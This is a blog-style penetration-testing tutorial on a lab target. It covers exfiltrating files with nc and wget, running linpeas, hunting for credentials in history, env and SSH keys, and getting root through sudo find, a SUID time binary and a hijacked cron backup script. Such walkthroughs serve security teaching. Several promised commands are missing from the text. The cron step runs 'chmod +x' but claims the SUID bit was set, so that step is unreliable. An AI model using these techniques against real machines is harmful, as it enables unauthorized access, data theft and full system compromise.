Data exfiltration - also known as data extrusion or data exportation - is data theft: the intentional, unauthorized, covert transfer of data from a computer or other device.
Not always ftp (file transfer protocol) services are available on attacked machine, but data still can be downloaded / exfiltrated using tools as wget and/or nc.
Some files cannot be viewed in terminal, as the .jpg images for example. To examine these, we need to download these first.
We set up listening on pentester's computer.
We compress desired folder, and without writing, without leaving tracks, we immediately transfer it to pentester's computer using the nc command.
We can see that file (with 'original' folder, compressed into one file) was succesfully transferred to the pentester's machine.
The md5sum tool can be used to verify integrity of downloaded file. The command usage is as follows:
Command to use wget to download file from attacked machine to pentester's machine is as follows:
(where 10.0.0.1 is pentester's machine IP Address, and 8888 is port on which we listen, on pentester's machine).
We execute above command on attacked machine, from the reverse shell. As with nc example above, we need to setup listening on pentester's machine too, before download, using the following command:
We might need to terminate the listening process after transfer using CTRL+C keys (or Command+C on Macintosh Computers), on pentester's machine.
When using wget to exfiltrate a file, first 9 lines need to be removed, as these are HTTP Headers that are added to the beginning of downloaded file. We can use command:
After this operation, md5 checksum should be same in both attacked machine and in pentester's machine.
Files & Data Transfer ( upload ).
When we want to upload some tools to attacked machine, first we need to check what tools are available in target machine.
Command to check if tool is available is:
Most common tools to use when ftp is not available are nc & grep.
Tools list, functionalities details and usage can be found on page: GTFOBins.
For example, we can transfer the linpeas.sh script to attacked machine, using command wget:
Linpeas script, when executed on a target machine, collects various informations and can be helpful for continuing the attack.
To execute this script, first we need to give it permission to be executed.
Now let's execute, directing the output to a: 'results.txt' file.
Now let's check the 'pass' pattern in the result file, using command: cat results.txt | grep pass
We have found credentials for user rkowalski! Let's login (change user) and list the contents of the 'flag.txt' file that we were aiming for. Not every user has privileges to read this file, but rkowalski does.
Privilege Escalation - Passwords & Keys.
Technique we explain in this section is called: 'Credentials Hunting'.
After we gain 'initial foothold' in attacked machine, we can search various locations and data in search for password & keys.
First we can check the history of executed commands using the: 'history' command.
Then, we can check environment variables using the: 'env' command.
Then, we can look for config files. Sometimes these contain useful information like hard-coded credentials.
Then, we can use found history data to switch user from www-data to rkowalski@localhost.
Now we continue our attack, from rkowalski@localhost account. We will try to search for ssh keys.
We did find stored ssh key!
Then we can look for users list in /etc/passwd file. Perhaps ssh key will let us connect to ssh as one (or more) of these users.
Let's try to login to the 'root' account.
Failure at this point. To use ssh, we need to spawn better terminal, and run ssh from it.
Let's spawn the 'bash' terminal using command: 'script -qc /bin/bash', and try to login as root@localhost user again.
Success!!!
We've gained access as the root user!
System fully compromised.
Privilege Escalation - Sudo.
After we gain 'initial foothold' in attacked machine, we can check if there are 'sudo-able' commands in the system. Command that does it is: 'sudo -l'.
There's one command that we (user rkowalski) can execute with sudo. It's the 'find' command.
Let's check on gtfobins webpage, how we can abuse this command.
We can see that 'find' command can be abused to spawn shell with root privileges, using the: 'sudo' command.
In our case, the command is: 'sudo /usr/bin/find . -exec /bin/bash \; -quit'.
Let's do it.
Success!!!
We've gained access as the root user!
System fully compromised.
Privilege Escalation - SUID.
After we gain 'initial foothold' in attacked machine, we can check if there are tools with 'SUID' bit set on attacked machine.
When we execute the command with SUID bit set, it's executed with file owner's privileges instead of privileges of user that executed the command.
Command to search for tools with SUID bit set is: 'find / -perm -4000 2>/dev/null'.
Let's check these commands on the gtfobins webpage.
We did find the 'time' command as vulnerable to the SUID-based attack.
Let's try this attack.
In our case, the command would be: '/usr/bin/time /bin/bash -p'.
Success!!!
We've gained access as the root user!
System fully compromised.
Privilege Escalation - CRON.
After we gain 'initial foothold' in attacked machine, we can use the CRON tool to execute a script with root privileges. We can copy the /bin/bash command for example to a chosen directory, and set it's SUID bit, so when we execute it, it's run with root privileges.
First, let's check the configuration file of CRON, named: 'crontab'. It's located in the '/etc/' directory.
It seems that the CRON tool executes the /opt/backup/backup.sh script every minute, with root privileges.
Let's list the /opt/backup/backup.sh file's contents.
Using the: 'ls -la' command, we confirm that the '/opt/backup' directory has permissions that allow for creating files inside with the 'execute' flag set on.
The '/opt/backup/backup.sh' file cannot be modified by non-root user, however.
Let's move the '/opt/backup/backup.sh' file to '/opt/backup/backup.sh.bak', so we can create our own '/opt/backup/backup.sh' file in it's place.
Now let's create the '/opt/backup/backup.sh' file with following commands:
'#!/bin/bash
cp /bin/bash /tmp/rootbash && chmod +x /tmp/rootbash'
Let's give +x privileges to our new '/opt/backup/backup.sh' file:
'chmod +x /opt/backup/backup.sh'
After a minute, the '/tmp/rootbash' file was created with the SUID bit set.
Let's execute it with the -p parameter, to keep the file owner's (root user's) privileges.
'/tmp/rootbash -p'.
Success!!!
We've gained access as the root user!
System fully compromised.
No comments:
Post a Comment